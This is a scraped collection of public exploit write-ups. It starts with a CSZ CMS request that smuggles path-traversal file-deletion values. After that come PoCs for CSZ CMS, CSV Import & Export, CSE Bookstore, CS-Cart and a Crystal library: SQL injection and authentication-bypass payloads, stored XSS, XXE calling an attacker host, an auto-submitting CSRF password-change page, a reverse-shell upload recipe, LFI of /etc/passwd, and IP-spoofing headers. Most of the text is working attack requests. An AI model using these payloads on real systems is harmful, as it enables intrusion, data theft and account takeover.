Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu
Connection: close

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTitle"

CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="title_setting"

2
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteFooter"

&copy; %Y% CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteKeyword"

CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTheme"

cszdefault
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLang"

english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_metatag"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_js"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="pagecache_time"

0
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="assets_static_domain"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="html_optimize_disable"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_file"

../../conf_secret_file.php
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLogo"

2021/1626800829_logo.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_og_image"

../../config_backup.txt
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="og_image"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ogImage"

2021/1626800829_og.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteEmail"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_protocal"

mail
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_host"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_user"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_pass"

123456
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_port"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="sendmail_path"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_logs"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_sitekey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_secretkey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_client_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_view_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gsearch_cxid"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_key"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lat"

-28.621975
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lng"

150.689082
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="fbapp_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="facebook_page_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="adobe_cc_apikey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_bg"

#645862
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_fg"

#ffffff
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_link"

#f1d600
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_msg"

This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our 
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_linkmsg"

Privacy Policy and terms.
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_moreinfo"

https://www.cszcms.com/LICENSE.md
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_txtalign"

left
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_close"

Got it!
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundary8cAl5KcKGP0D3Qi2--

---


# For more explaination, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32
# The affected version is 1.2.9.
HireHackking 
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Unauthorized user that has access private message can embed Javascript
# code to admin panel.

# Steps to reproduce:
1- Log in to member panel.
1- Change user-agent header as <script>alert(1)</script>
2- Send the private message to admin user.
3- When admin user logs in to Backend System Dashboard, an alert box pops
up on screen.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send
HireHackking 
# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Authenticated user can inject hyperlink to Backend System Dashboard and
# Member Dashboard via message.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
click to view</a></b></h1>&message=phishing&submit=Send
HireHackking 
# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site
Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
# Version: 1.1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The 'offset' and 'db' parameters in the database table
preview query has vulnerabilities.
====================================================
# PoC : SQLi :

Parameter: offset (GET)
    Type: UNION query
    Demo:
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30&limit=10
    Title: Generic UNION query (NULL) - 10 columns
    Payload: action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30
UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL--
STgb&limit=10


====================================================
# PoC : XSS :

Payload =
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10
HireHackking 
# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757

##################################################################################
.__                                                  __   
|  |__ _____    _____   _____ _____    _____   _____/  |_ 
|  |  \\__  \  /     \ /     \\__  \  /     \_/ __ \   __\
|   Y  \/ __ \|  Y Y  \  Y Y  \/ __ \|  Y Y  \  ___/|  |  
|___|  (____  /__|_|  /__|_|  (____  /__|_|  /\___  >__|  
     \/     \/      \/      \/     \/      \/     \/      
.__        _____                            __  .__                      
|__| _____/ ____\___________  _____ _____ _/  |_|__| ________ __   ____  
|  |/    \   __\/  _ \_  __ \/     \\__  \\   __\  |/ ____/  |  \_/ __ \ 
|  |   |  \  | (  <_> )  | \/  Y Y  \/ __ \|  | |  < <_|  |  |  /\  ___/ 
|__|___|  /__|  \____/|__|  |__|_|  (____  /__| |__|\__   |____/  \___  >
        \/                        \/     \/            |__|           \/ 
                          .__                     
  ______ ______________  _|__| ____  ____   ______
 /  ___// __ \_  __ \  \/ /  |/ ___\/ __ \ /  ___/
 \___ \\  ___/|  | \/\   /|  \  \__\  ___/ \___ \ 
/____  >\___  >__|    \_/ |__|\___  >___  >____  >
     \/     \/                    \/    \/     \/ 

                                                                                                                                         
##################################################################################                                
SQL Injection Authentication Bypass
Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
 
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any password :-) 
login : admin' or ' 1=1--
password: hammamet informatique services
HireHackking 
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
# Date      : 2020-12-21
# Author    : Musyoka Ian
# Version   : CSE Bookstore 1.0
# Vendor Homepage: https://projectworlds.in/
# Platform  : PHP
# Tested on : Debian

CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability  will lead to an attacker dumping the entire database the web appliction is running on

Below is results returned by  SQLMap 

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138#                                                                                                                                                                    Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT


POC 1 

REQUEST
========
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: 192.168.196.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1

RESPONSE
========

HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:09:49 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=UTF-8

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1

POC 2
Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter

REQUEST
=======

POST /ebook/cart.php HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9


bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart

RESPONSE
=======
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1

POC 3.
Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials

REQUEST
=======
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on

RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:47:58 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html; charset=UTF-8

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
HireHackking 
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909


CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. 
By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.

Payload: 
Name: admin
Pass: %' or '1'='1 

Sample BurpSuite intercept:

POST /bookstore/admin_verify.php HTTP/1.1
Host: 192.168.20.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://192.168.20.131
Connection: close
Referer: http://192.168.20.131/bookstore/admin.php
Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
Upgrade-Insecure-Requests: 1

name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query
HireHackking 
# Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting
# Date: 30/10/2020
# Exploit Author: Vyshnav NK
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 and Windows 7

CSE Bookstore is vulnerable to a Persistent Cross-site scripting  on Checkout.php and cartp.php, Where an user can able to add quantity as an XSS Payload and once added each time when we click on MyCart option it triggers as stored one

The below URL can be accessed by a User

URL :  http://localhost/php/checkout.php and http://localhost/php/cart.php

Payload : "><svg/onload=alert(5)>

Insert XSS Payload into Quantity Section
HireHackking 
# Software : CS-Cart <= 4.3.10
# Vendor home : cs-cart.com
# Author : Ahmed Sultan (@0x4148)
# Home : 0x4148.com
# Email : 0x4148@gmail.com
# Tested on : apache on windoes with php 5.4.4 / apache on linux with php <5.2.17

From vendor site
CS-Cart is an impressive platform for users to any level of eCommerce
experience.
With loads of features at a great price, CS-Cart is a great shopping cart
solution that will quickly enable your online store to do business.

XXE I : Twimgo addon
app/addons/twigmo/Twigmo/Api/ApiData.php
Line 131
public static function parseDocument($data, $format =
TWG_DEFAULT_DATA_FORMAT)
{
if ($format == 'xml') {
$result = @simplexml_load_string($data, 'SimpleXMLElement',
LIBXML_NOCDATA);
return self::getObjectAsArray($result);
} elseif ($format == 'jsonp') {
return (array) json_decode($data, true);
} elseif ($format == 'json') {
return (array) json_decode($data, true);
}

return false;
}
POC
<?php
$xml="
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM 'http://YOUR_HOST/0x4148.jnk' >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>&xxe;</killit>
</document>
";
echo rawurlencode(base64_encode($xml));
?>

change YOUR_HOST to your server address , use the output in the following
POST request
Action -> HOST/cs-cart/index.php?dispatch=twigmo.post
Data -> action=add_to_cart&data=DATA_OUT_PUT_HERE&format=xml
a GET request will be sent to your webserver from the vulnerable host
indicating successful attack
(Require twimgo addon to be activated)

XXE II : Amazon payment
File : app/payments/amazon/amazon_callback.php
Line 16
use Tygh\Registry;

if (!defined('BOOTSTRAP')) { die('Access denied'); }

include_once (Registry::get('config.dir.payments') .
'amazon/amazon_func.php');

fn_define('AMAZON_ORDER_DATA', 'Z');

if (!empty($_POST['order-calculations-request'])) {
$xml_response = $_POST['order-calculations-request'];

} elseif (!empty($_POST['NotificationData'])) {
$xml_response = $_POST['NotificationData'];
}

if (!empty($_POST['order-calculations-error'])) {
// Process the Amazon callback error
$xml_error = $_POST['order-calculations-error'];
$xml = @simplexml_load_string($xml_error);
if (empty($xml)) {
$xml = @simplexml_load_string(stripslashes($xml_error));
}

// Get error message
$code = (string) $xml->OrderCalculationsErrorCode;
$message = (string) $xml->OrderCalculationsErrorMessage;

POC
sending POST request to
app/payments/amazon/amazon_checkout.php
setting POST parameter order-calculations-request to
<?xml version='1.0'?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://host/amazon.jnk" >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>%26xxe%3b</killit>
</document>

Will result in an GET request to your host from the vulnerable machine ,
indicating successful attack
(Require amazon payment method to be activated)


Disclosure time line
10/11 vulnerabilities reported to the vendor
11/11 Vendor asked for extra details
12/11 Vendor acknowledged the validity of vulnerabilities and asked for
time to fix
16/11 vendor permitted public release

Reference
https://0x4148.com/2016/11/10/cs-cart/
HireHackking 
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]

Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.

Exploit pasted below and attached.

<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
    Exploit By: Connection
    Blacksun Hacker's Club
    irc.blacksunhackers.com #lobby
-->
    <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
      <input type="hidden" name="user_data[password1]" value="CSRFpass" />
      <input type="hidden" name="user_data[password2]" value="CSRFpass" />
      <input type="hidden" name="user_data[profile_name]" value="Concept" />
      <input type="hidden" name="dispatch[profiles.update]" value="" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>


Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground
HireHackking 
source: https://www.securityfocus.com/bid/49378/info

CS-Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CS-Cart 2.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/controllers/customer/products.php?tabs_group_id=[SQL INJECT]
HireHackking 
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE



get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
HireHackking 
# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI


http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example: 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
HireHackking 
# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass
# Exploit Author : Halis Duraki (@0xduraki)
# Date : 2020-05-28
# Product : http-protection (Crystal Shard)
# Product URI : https://github.com/rogeriozambon/http-protection
# Version : http-protection <= 0.2.0
# CVE : N/A

## About the product

This library/shard (http-protection) protects against typical web attacks with-in Crystal applications. It was inspired by rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the Shard get the traction on Crystal official channels (Crystals' ANN, Gitter, and Shardbox).

## About the exploit

The `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent it). Both of this functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting difference between IP addr values of `X-Forwarded-For` & `X-Real-IP/X-Client-IP`. If the values mismatch, the middleware protects the application by forcing `403 (Forbidden)` response.

Relevant code (src/http-protection/ip_spoofing.cr):

```
module HTTP::Protection
class IpSpoofing
...

def call(... ctx)
...
ips = headers["X-Forwarded-For"].split(/\s*,\s*/)

return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"])
return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"])
...
end
end
end
```

The exploit works by hardcoding the values in all protection request headers following the same const IP Address. The standard format for `X-Forwarded-For` from MDN reference those values as: `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls.

@see CWE-16: https://cwe.mitre.org/data/definitions/16.html

## PoC (Proof of Concept)

* Set a breakpoint on the request, or intercept request.
* Hardcore all three request headers:
* X-Forwarded-For: 123.123.123.123
* X-Client-IP: 123.123.123.123
* X-Real-IP: 123.123.123.123
* Continue request.
* Response should be 200 OK, otherwise, 400 Forbidden.

++ Request example (POC):

```
GET / HTTP/1.1
Host: localhost.:8081
X-Forwarded-For: 123.123.123.123
X-Client-IP: 123.123.123.123
X-Real-IP: 123.123.123.123
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
```

++ Response (POC):

```
200 OK
````

## Fix

It is advised to fix the IpSpoofing detection via checking socket data directly instead of relying on passed header key/vals. The other solution is to force proxy to dismiss such data (on request) and use original source (proxified).

==============================================================================================================
+ Halis Duraki | duraki@linuxmail.org | @0xduraki | https://duraki.github.io
==============================================================================================================